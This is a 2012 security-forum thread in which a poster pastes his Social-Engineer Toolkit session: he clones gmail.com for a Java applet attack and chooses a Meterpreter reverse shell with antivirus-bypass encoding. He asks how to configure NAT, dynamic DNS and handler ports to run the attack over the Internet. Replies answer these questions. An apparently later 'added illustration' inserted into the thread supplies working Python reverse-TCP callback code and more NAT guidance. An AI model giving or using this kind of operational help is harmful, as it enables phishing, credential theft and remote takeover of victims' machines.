Shinigami Posted June 28, 2012

Hi, before I pose my query, I would like to introduce myself. I'm a CEH and ECSA for quite some time now. However, I'm still learning, and today I was just curious in understanding the routing on how SET is connected to the MSF.

Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to.

Setting up JavaApplet in S.E.T:

1) Java Applet Attack Method
set:webattack>1
2) Site Cloner
set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: y
#####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***######
#####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n#######
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://gmail.com
[*] Cloning the website: https://gmail.com
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:
Name: Description:
1) Windows Shell Reverse_TCP          Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter    Spawn a meterpreter shell on victim and send back to attacker
set:payloads>2

Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best.
1) avoid_utf8_tolower (Normal)
16) Backdoored Executable (BEST)
set:encoding>16
#####set:payloads> PORT of the listener [443]:#####
[*] Generating x64-based powershell injection code...

FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or another DNS name instead of an IP address here? I have a dynamic IP issue here, since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.

SECOND: The second line of code following; I seriously don't understand this. If I put in a local static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option before this one? And why would it ask for my HANDLER's IP when it generates its own handler? Please elaborate on this option, thank you.

THIRD: The last HASHED line that asks for a PORT; if I'm not wrong, this is the HANDLER's port?

LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester alongside it when they both are on different ports?

Thank you
Infiltrator Posted June 29, 2012

> FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or another DNS name instead of an IP address here? I have a dynamic IP issue here, since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.

If your external IP address is dynamic, then I'd use a No-IP "hostname"; if it's static I'd just use the IP.

> THIRD: The last HASHED line that asks for a PORT; if I'm not wrong, this is the HANDLER's port?

Correct. When the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443, but it can be changed to any port you want.

> LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester alongside it when they both are on different ports?

It won't be possible to run both applications on the same ports. What you could do is have both apps running at the same time but on different ports.
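The reverse-connection model behind these prompts, as an added illustration that is not SET's or Metasploit's code: the handler binds to a local address (a private LAN address when the attacker box sits behind NAT), while the target is handed an advertised hostname or external IP, resolves it at connect time, and connects back through the port forward. The listener port is independent of the web-server port that serves the applet. Function names, the `localhost` hostname and the banner text are assumptions chosen for the demo. One caveat a practitioner should keep in mind: this demo resolves the hostname on the target side at run time, which is what makes a dynamic-DNS name useful; whether a real stager does the same depends on the payload, since Metasploit's plain Windows `reverse_tcp` stager embeds the LHOST as an IPv4 address when the payload is generated, and the `reverse_tcp_dns` variants are the ones that carry the hostname. Test the generated payload against the hostname before relying on it.

```python
"""Added illustration of a reverse-TCP callback behind NAT (not SET's or
Metasploit's code). The handler binds to a local address; the target
resolves the advertised hostname at connect time. Names, ports and the
banner are assumptions chosen for the demo."""
import socket
import threading


def start_handler(bind_host="0.0.0.0", port=0):
    """Bind the listener. bind_host is where the handler listens (the
    private LAN address when behind NAT); it is not what the target is
    told. port=0 asks the OS for a free port so the demo never collides."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, port))
    srv.listen(1)
    return srv


def wait_for_callback(srv, timeout=5.0):
    """Accept one inbound connection and return (peer_addr, first_line)."""
    srv.settimeout(timeout)
    conn, peer = srv.accept()
    with conn:
        data = conn.recv(1024)
    return peer, data.decode()


def connect_back(advertised_host, port, banner=b"hello from target\n"):
    """Target side: resolve the advertised hostname now (run time, not
    payload-generation time), try each IPv4 answer until one accepts,
    send a banner, and return the IP that was actually used."""
    infos = socket.getaddrinfo(advertised_host, port,
                               socket.AF_INET, socket.SOCK_STREAM)
    for family, socktype, proto, _, sockaddr in infos:
        try:
            with socket.socket(family, socktype, proto) as s:
                s.settimeout(5.0)
                s.connect(sockaddr)
                s.sendall(banner)
                return sockaddr[0]
        except OSError:
            continue  # stale DNS answer or closed port: try the next one
    raise ConnectionError(f"no address for {advertised_host} accepted the connection")


def demo(advertised_host="localhost"):
    """Run handler and target in one process. Returns the listener port,
    the IP the target resolved, and the banner the handler received."""
    srv = start_handler("0.0.0.0", 0)
    port = srv.getsockname()[1]
    result = {}

    def listener():
        result["peer"], result["banner"] = wait_for_callback(srv)

    t = threading.Thread(target=listener)
    t.start()
    resolved = connect_back(advertised_host, port)
    t.join()
    srv.close()
    return {"port": port, "resolved_ip": resolved, "banner": result["banner"]}


if __name__ == "__main__":
    print(demo())
```

Over the Internet the `bind_host` would be the attacker box's private address (or `0.0.0.0`), the router would forward the chosen port to it, and `advertised_host` would be the No-IP name; the only value the target ever sees is `advertised_host:port`, which is why the web server's address prompt and the handler's port prompt are the two that must match the outside view.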
Shinigami Posted June 29, 2012 (Author)

> If your external IP address is dynamic, then I'd use a No-IP "hostname"; if it's static I'd just use the IP.

> Correct. When the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443, but it can be changed to any port you want.

> It won't be possible to run both applications on the same ports. What you could do is have both apps running at the same time but on different ports.

Thank you! Very grateful for your response, very elaborate. Can you please explain the SECOND query I posted, concerning the code where it asks if my Metasploit is running on the same IP or a different one? Should I use my local IP here or the public one again? Thanks again.
bobbyb1980 Posted June 29, 2012

I believe the attack you're trying uses multiple handlers for different payloads, and they'd each be running on different ports. Your config file should explain it.